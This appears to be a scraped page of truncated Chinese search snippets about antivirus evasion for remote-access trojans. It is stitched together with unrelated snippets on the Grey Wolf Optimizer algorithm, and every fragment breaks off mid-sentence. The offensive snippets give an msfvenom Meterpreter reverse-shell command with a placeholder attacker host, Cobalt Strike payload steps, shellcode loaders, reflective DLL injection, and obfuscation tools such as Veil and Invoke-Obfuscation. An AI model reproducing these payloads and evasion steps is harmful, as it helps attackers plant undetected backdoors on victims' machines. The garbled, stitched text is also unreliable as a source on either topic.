大灰狼远控免杀

MSF-payload：msfvenom -p windows/meterpreter/reverse_tcp lhost=X.X.X.X lport=6688 -f c CS-payload： 攻击--生成后门--payload生成器--选择监听器和输出格式为C语言 python 3.10-32位，注意python解释器一定要切换为32位 将shellcode填入，run即可上线，payload均为32位 #Python-混淆加密-Base64AES反序列化等 pyt

目录 一、导图 二、远程控制-向日葵VncTeamviewer 1、向日葵         ▶漏洞利用工具下载地址：         ▶实例展示： 2、Vnc         ▶Vnc简介：         ▶实例展示： 3、Teamviewer         ▶Teamviewer简介：         ▶实例展示： 三、设备平台-Zabbix-CVE-2022-2

GWO 算法的等级结构 灰狼优化算法是模拟食物链顶端的捕食者狼群的捕食行为产生的算法。灰狼大都喜欢群居， 且具有非常严格的社会等级制度，如图 1 金字塔结 构的等级制度所示。 GWO 算法的数学模型 ​ 在 GWO 算法数学建模中，每只灰狼代表种群 中 1 个候选解，将最优解

阅读前请注意： 本人发布的此篇技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站，服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接

0x01 生成shellcode 首先通过下列命令生成一个shellcode，使用msfvenom -p选项来指定paylaod，这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。 0x02 加载与执行shellcode的程序 程序为： 0x03 程序解释 导入模块，并且程

一起学习 代码审计、安全开发、web攻防、逆向等。。。 私信联系 主程序 可执行程序 服务端生成器 主机上线 服务端程序 和 服务 文件管理 CMD 进程 服务自启动 编写前 功能了解分析 界面 运行模式 主程序 主对话框 操作菜单 列表框 配置信息 多线程操作 非模式对话框 操作系

DLL（动态链接库）注入技术是木马程序，远控程序免杀过程中很常见的一种技术。但是这种技术随着时间的流逝，免杀效果越来越差。因此，需要在原版的基础上我们需要去升级成反射注入，也是目前主流的免杀方式之一，反射注入的介绍我们在下面详解。 在我们继续下面的

C/C++ -- ShellCode - 免杀对抗 介绍：          shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload，而这个payload里面就是一段十六进制的机器码。 为什么要使用 shellcode ：

c++编译环境 一串简单的将shellcode加载入windows内存执行的c++代码 payload变量里存储的就是我们的shellcode 代码： 作用： 代码： 作用： 代码： 解释： 代码： 作用： 代码： 作用： 代码： 作用： 代码： 作用： 这就是一个简单的将shellcode加载进windows内存里执行的程序代码 如果

蓝队追踪者工具TrackAttacker，以及免杀马生成工具。 做过防守的都知道大HW时的攻击IP量，那么对于这些攻击IP若一个个去溯源则显得效率低下，如果有个工具可以对这些IP做批量初筛是不是更好？ 0x2 TrackAttacker获取 https://github.com/Bywalks/TrackAttacker Golang免杀马生成工具，在重复造

1 Veil的使用 （1）Veil主要用于生成：免杀payload （2）下载地址：https://github.com/Veil-Framework/Veil （3）安装过程：https://blog.csdn.net/qq_53079406/article/details/126192511 2 生成有效载荷payload 选择payload Generator 选择Veil 不要选择 x64可能出错。不要打勾就可以了。 3 Veil免杀过程 运行veil 在终

协议模块使用，Request爬虫技术，简易多线程技术，编码技术，Bypass后门技术 掌握利用强大的模块实现各种协议连接操作(爆破或利用等)，配合Fuzz吊打WAF等 Python开发-简单多线程技术实现脚本 queue，threading模块使用 Python开发-利用FTP模块实现协议爆破脚本 1.ftplib模块使用 2.遍历

为什么会有改造蚁剑的想法，之前看到有做冰蝎的流量加密，来看到绕过waf，改造一些弱特征，通过流量转换，跳过密钥交互。 但是，冰蝎需要反编译去改造源码，再进行修复bug，也比较复杂。而AntSword相对于冰蝎来说，不限制webshell，即一句话也可以进行连接，还可以自定

效果 可以看到成功上线 这个先不做免杀，之后补充

Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-Obfuscation Invoke-Obfuscation是一款PowerShell混淆工具，可以将PowerShell脚本加密，使得它的检测和分析变得更加困难。该工具包含多种加密方法，可以单独使用也可以结合使用，以提高混淆的效果。Invoke-Obfuscation还有多个选

这周有粉丝私信想让我出一期GWO-KELM的文章，因此乘着今天休息就更新了(希望不算晚) 作者在前面的文章中介绍了ELM和KELM的原理及其实现，ELM具有训练速度快、复杂度低、克服了传统梯度算法的局部极小、过拟合和学习率的选择不合适等优点，而KELM则利用了核学习的方法，用